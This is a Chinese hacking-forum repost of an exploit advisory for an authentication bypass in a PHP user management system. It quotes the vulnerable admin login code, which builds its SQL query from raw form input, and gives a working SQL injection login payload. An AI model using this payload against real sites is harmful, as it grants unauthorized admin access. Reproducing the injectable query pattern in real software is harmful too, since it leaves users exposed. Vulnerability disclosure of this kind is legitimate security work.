User Management System 2.0 - Authentication Bypass - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月4日2年前

# Exploit Title: User Management System 2.0 - Authentication Bypass
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: v2.0
# Tested on: Xampp
# Credit: İsmail BOZKURT


------ Details:

1- Vulnerable code is here (admin login: /admin/index.php):

<?php
session_start();
include("dbconnection.php");
if(isset($_POST['login']))
{
  $adminusername=$_POST['username'];
  $pass=md5($_POST['password']);
  $ret=mysqli_query($con,"SELECT * FROM admin WHERE
username='$adminusername' and password='$pass'");
  $num=mysqli_fetch_array($ret);
if($num>0)
{
   $extra="manage-users.php";
   $_SESSION['login']=$_POST['username'];
   $_SESSION['id']=$num['id'];
echo "<script>window.location.href='".$extra."'</script>";
exit();
}
else
{
    $_SESSION['action1']="*Invalid username or password";
   $extra="index.php";
echo "<script>window.location.href='".$extra."'</script>";
exit();
}
}

2-  We can bypass authentication with SQLi:

Bypass code (user and admin login panel):

Username: pentester' or'1'=1#
Password : pentester' or'1'=1#

Finally: There is a lot of SQLi input in this project. Like, login,
registration, forgot password ...

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

User Management System 2.0 - Authentication Bypass

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索